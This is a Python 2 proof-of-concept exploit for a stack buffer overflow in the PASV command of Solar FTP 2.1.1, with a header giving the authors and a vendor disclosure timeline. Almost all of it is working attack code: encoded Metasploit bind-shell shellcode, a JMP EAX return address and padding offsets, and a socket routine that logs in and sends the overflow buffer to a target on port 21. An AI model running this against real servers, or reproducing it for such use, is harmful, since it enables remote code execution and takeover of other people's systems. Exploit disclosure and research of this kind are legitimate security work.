#!/usr/bin/python

#Title: Solar FTP 2.1.1 PASV Command PoC
#Authors: Craig Freyman (@cd1zz) and Gerardo Iglesias (@iglesiasgg)
#Tested: Windows XP SP3
#Vendor Contacted July 11, 2011
#Vendor Response: July 12, 2011 - Will fix ASAP, approved release of PoC.
#Notes: We found different offsets depending on the subnet that the server was running on.
#This particular exploit was run with the server running on 192.168.133.128. If you test this exploit and the
#app just crashes instead of running the shellcode, pass the exeptions through your debugger and after
#about 5 of them, you'll see EIP overwritten. If you can figure out why these offsets change, more power to you!
#We found the most consistent behavior using a total buffer of about 2127 bytes.

import socket,sys,time,struct

if len(sys.argv) < 2:
     print "[-]Usage: %s <target addr> " % sys.argv[0]
    
     sys.exit(0)

target = sys.argv[1]

if len(sys.argv) > 2:
     platform = sys.argv[2]

#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b '\x00'
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = ("\xd9\xcf\xbe\x41\xb0\x13\xe9\xd9\x74\x24\xf4\x5f\x29\xc9"
"\xb1\x56\x31\x77\x18\x03\x77\x18\x83\xc7\x45\x52\xe6\x15"
"\xad\x1b\x09\xe6\x2d\x7c\x83\x03\x1c\xae\xf7\x40\x0c\x7e"
"\x73\x04\xbc\xf5\xd1\xbd\x37\x7b\xfe\xb2\xf0\x36\xd8\xfd"
"\x01\xf7\xe4\x52\xc1\x99\x98\xa8\x15\x7a\xa0\x62\x68\x7b"
"\xe5\x9f\x82\x29\xbe\xd4\x30\xde\xcb\xa9\x88\xdf\x1b\xa6"
"\xb0\xa7\x1e\x79\x44\x12\x20\xaa\xf4\x29\x6a\x52\x7f\x75"
"\x4b\x63\xac\x65\xb7\x2a\xd9\x5e\x43\xad\x0b\xaf\xac\x9f"
"\x73\x7c\x93\x2f\x7e\x7c\xd3\x88\x60\x0b\x2f\xeb\x1d\x0c"
"\xf4\x91\xf9\x99\xe9\x32\x8a\x3a\xca\xc3\x5f\xdc\x99\xc8"
"\x14\xaa\xc6\xcc\xab\x7f\x7d\xe8\x20\x7e\x52\x78\x72\xa5"
"\x76\x20\x21\xc4\x2f\x8c\x84\xf9\x30\x68\x79\x5c\x3a\x9b"
"\x6e\xe6\x61\xf4\x43\xd5\x99\x04\xcb\x6e\xe9\x36\x54\xc5"
"\x65\x7b\x1d\xc3\x72\x7c\x34\xb3\xed\x83\xb6\xc4\x24\x40"
"\xe2\x94\x5e\x61\x8a\x7e\x9f\x8e\x5f\xd0\xcf\x20\x0f\x91"
"\xbf\x80\xff\x79\xaa\x0e\x20\x99\xd5\xc4\x57\x9d\x1b\x3c"
"\x34\x4a\x5e\xc2\xab\xd6\xd7\x24\xa1\xf6\xb1\xff\x5d\x35"
"\xe6\x37\xfa\x46\xcc\x6b\x53\xd1\x58\x62\x63\xde\x58\xa0"
"\xc0\x73\xf0\x23\x92\x9f\xc5\x52\xa5\xb5\x6d\x1c\x9e\x5e"
"\xe7\x70\x6d\xfe\xf8\x58\x05\x63\x6a\x07\xd5\xea\x97\x90"
"\x82\xbb\x66\xe9\x46\x56\xd0\x43\x74\xab\x84\xac\x3c\x70"
"\x75\x32\xbd\xf5\xc1\x10\xad\xc3\xca\x1c\x99\x9b\x9c\xca"
"\x77\x5a\x77\xbd\x21\x34\x24\x17\xa5\xc1\x06\xa8\xb3\xcd"
"\x42\x5e\x5b\x7f\x3b\x27\x64\xb0\xab\xaf\x1d\xac\x4b\x4f"
"\xf4\x74\x7b\x1a\x54\xdc\x14\xc3\x0d\x5c\x79\xf4\xf8\xa3"
"\x84\x77\x08\x5c\x73\x67\x79\x59\x3f\x2f\x92\x13\x50\xda"
"\x94\x80\x51\xcf")

#7C9572D8 JMP EAX

ret = struct.pack('<L', 0x7C9572D8)

#works when the server is on 192.168.133.128
padding = "\x43" * 100
junk = "\x43" * (1900 - len(shellcode))
frontpad = "\x41" * 100 + "\xeb\x30" + "\x41" * 21
crash = frontpad + ret + padding + shellcode + junk

print "\
[*] Solar FTP 2.1.1 PASV Exploit\n\
[*] Authors: Craig Freyman (@cd1zz) and Gerardo Iglesias (@iglesiasgg)\n\
[*] Connecting to "+target

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,21))
except:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)

print "[*] Sending " + `len(crash)` + " byte PASV crash..."

s.send("USER test\r\n")
s.recv(1024)
s.send("PASS test\r\n")
s.recv(1024)
s.send("PASV " + crash + "\r\n")